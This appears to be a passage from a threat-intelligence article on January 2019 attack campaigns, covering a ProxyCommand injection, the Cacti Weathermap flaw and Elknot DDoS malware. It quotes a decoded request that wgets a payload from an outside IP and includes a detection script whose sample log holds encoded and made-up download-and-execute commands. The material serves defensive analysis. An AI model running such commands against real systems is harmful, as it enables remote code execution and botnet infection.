Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in January 2019
- by nlqip
After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is:
oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit.
Again, in this case the threat actor had already taken the malicious file offline before the researchers could retrieve it for analysis.
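The request above only shows its payload after decoding, which is the practical lesson for detection: match on the decoded form of the parameters, not on the wire form. The following Python is an added example, not code from the original article; it repeatedly URL-decodes request strings and flags an SSH ProxyCommand option being assigned a command, a wget/curl fetch from a bare IP address, and a fetch chained straight into execution. The indicator names and patterns are this example's own choices; the sample log lines are constructed (line 2 is the article's request as it would be percent-encoded on the wire, line 3 is the same request encoded twice, and line 4 is a made-up download-and-execute chain against the TEST-NET address 192.0.2.10).

```python
import re
from urllib.parse import unquote_plus

# Indicators worth matching once a request has been decoded. The names and
# patterns are this example's own choices, not anything from the article.
PATTERNS = {
    # an SSH option (ProxyCommand) being assigned a command, as in the decoded request above
    "proxycommand_injection": re.compile(r"ProxyCommand\s*=\s*\S", re.IGNORECASE),
    # wget/curl fetching from a bare IPv4 address rather than a hostname, a common dropper trait
    "ip_download": re.compile(
        r"\b(?:wget|curl)\b[^&;|\n]*https?://(?:\d{1,3}\.){3}\d{1,3}", re.IGNORECASE
    ),
    # fetch chained straight into execution: wget ... ; chmod +x ...; ./payload
    "download_and_execute": re.compile(
        r"\b(?:wget|curl)\b.*?(?:;|\|\||&&|\|)\s*(?:chmod|sh|bash|perl|python|\./)",
        re.IGNORECASE | re.DOTALL,
    ),
}


def decode_layers(s, max_layers=5):
    """URL-decode repeatedly until the text stops changing.

    A single-pass decoder misses payloads that were percent-encoded twice,
    which is exactly what hides a wget from a naive keyword match.
    """
    for _ in range(max_layers):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_request(raw):
    """Return (decoded_text, [matched indicator names]) for one raw request string."""
    decoded = decode_layers(raw)
    hits = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
    return decoded, hits


def scan_log(lines):
    """Scan raw request strings; return (line_no, hits, decoded) for each suspicious one."""
    findings = []
    for n, line in enumerate(lines, 1):
        decoded, hits = scan_request(line)
        if hits:
            findings.append((n, hits, decoded))
    return findings


# Constructed sample input (see the lead-in): a benign login, the article's request
# percent-encoded once, the same request encoded twice, and a made-up chained dropper.
SAMPLE_LOG = [
    "user=alice&passwd=hunter2&server_type=imap&f_submit=Submit",
    "oProxyCommand=%20wget%20http%3A%2F%2F185.29.8.28%2Fdown.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit",
    "oProxyCommand%3D%2520wget%2520http%253A%252F%252F185.29.8.28%252Fdown.php%26port%3D143",
    "cmd=wget%20http%3A%2F%2F192.0.2.10%2Fx.sh%3Bchmod%20%2Bx%20x.sh%3B.%2Fx.sh",
]

if __name__ == "__main__":
    for n, hits, decoded in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}\n    {decoded}")
```

The decode loop is the important part: the double-encoded line 3 carries no literal "wget" or "http://" at all until it has been decoded twice, so a matcher that inspects the raw request body would pass it as clean. Capping the number of decode passes keeps a hostile input from turning the decoder into a busy loop.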
Weathermap Editor (Cacti plugin) Arbitrary Code Execution (CVE-2013-3739)
Another known threat actor was seen attempting to exploit the PHP Weathermap Editor plugin for Cacti. This vulnerability was first disclosed in April 2013. The threat actor exploits it to download and execute a variant of the Elknot/BillGates malware. Elknot is a well-known DDoS botnet family that runs on Linux and Windows systems; first detected in 2014, it is used to launch DDoS attacks and appears to be spreading again. The attack vectors built into the malware include ICMP flood, TCP flood, UDP flood, SYN flood, HTTP flood (Layer 7), and DNS reflection floods. As shown in Figure 8, 33 engines on VirusTotal.com detected this file as malicious.